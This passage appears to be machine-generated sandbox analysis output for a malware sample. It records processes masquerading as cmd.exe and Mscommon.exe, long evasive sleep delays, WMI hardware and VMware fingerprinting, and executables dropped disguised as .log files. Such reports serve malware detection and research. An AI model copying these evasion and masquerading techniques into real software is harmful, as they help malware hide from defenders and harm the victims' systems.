                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 300000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595031
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594797
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594640
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594303
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594026
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593762
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593613
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593484
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593375
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593265
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593156
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592994
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592852
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592734
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592609
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592500
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592390
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592281
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592172
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592037
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591795
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591661
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591454
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591302
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 590659
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 590507
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWindow / User API: threadDelayed 4030
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWindow / User API: threadDelayed 5694
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\spksuybo.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\oGeTRkCA.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\bhUNaLwZ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\iaQciIuf.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\TnEFcwnq.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\PIewODkQ.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\QCZpVjcx.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\BpLaswaY.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\NDzgjDBy.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\RrReMzQm.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\CXEIeahW.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\sfNsKLIr.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\hJqUpVHL.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\FrRytwYk.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\KVMxlGUc.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\wwCruhPB.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\iXYuZrQJ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\AEzAQzJw.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\WGSwrSeE.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\GTFZlGXP.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\XDtENRtz.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\JmTPAbOe.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\SzUnVzkJ.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\vwiBQQWj.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\JVsHHpbK.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\lZeSZrOV.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\dwWdpxyo.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\WmSvTfGg.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\bZkuwcVU.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\RTAxOVPQ.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\LSnFHGjW.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\SIrnFmDG.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\zepZsevX.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\vIyiJTTD.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\fplMbujm.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\jXskDIJa.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\qVgkgWEP.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\BjUpXdep.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\KAZQIQEM.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\cNoChqRS.logJump to dropped file
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeDropped PE file which has not been started: C:\Users\user\Desktop\gVlLDILN.logJump to dropped file
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\RCtfAzVO.logJump to dropped file
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23422
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7544Thread sleep time: -30000s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -32281802128991695s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -600000s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -599830s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -599703s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -599593s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -599417s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -599129s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -599000s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 4852Thread sleep time: -3600000s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -598844s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -598645s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -598437s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -598172s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -598061s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -597906s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -597760s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -596953s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -596719s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -596578s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -596250s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -596109s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595999s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595781s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595652s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595539s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595406s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595296s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595149s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 4852Thread sleep time: -300000s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -595031s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -594906s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -594797s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -594640s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -594303s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -594026s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593906s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593762s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593613s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593484s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593375s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593265s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -593156s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592994s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592852s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592734s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592609s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592500s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592390s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592281s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592172s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -592037s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -591906s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -591795s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -591661s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -591454s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -591302s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -590659s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7792Thread sleep time: -590507s >= -30000s
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 2692Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7840Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 6280Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 7596Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 8120Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exe TID: 1456Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0036A69B
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0037C220
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037E6A3 VirtualQuery,GetSystemInfo,0_2_0037E6A3
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 30000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 600000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599830
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599703
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599593
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599417
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599129
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 599000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 3600000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598844
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598645
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598437
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598172
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 598061
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 597906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 597760
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596953
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596719
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596578
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596250
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 596109
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595999
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595781
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595652
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595539
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595406
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595296
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595149
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 300000
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 595031
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594797
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594640
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594303
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 594026
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593762
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593613
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593484
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593375
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593265
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 593156
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592994
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592852
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592734
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592609
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592500
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592390
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592281
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592172
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 592037
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591906
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591795
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591661
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591454
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 591302
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 590659
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 590507
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: wscript.exe, 00000001.00000003.1948653672.000000000345A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1948653672.000000000345A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
                                    Source: kJrNOFEGbQ.exe, 00000000.00000003.1664853002.0000000003551000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
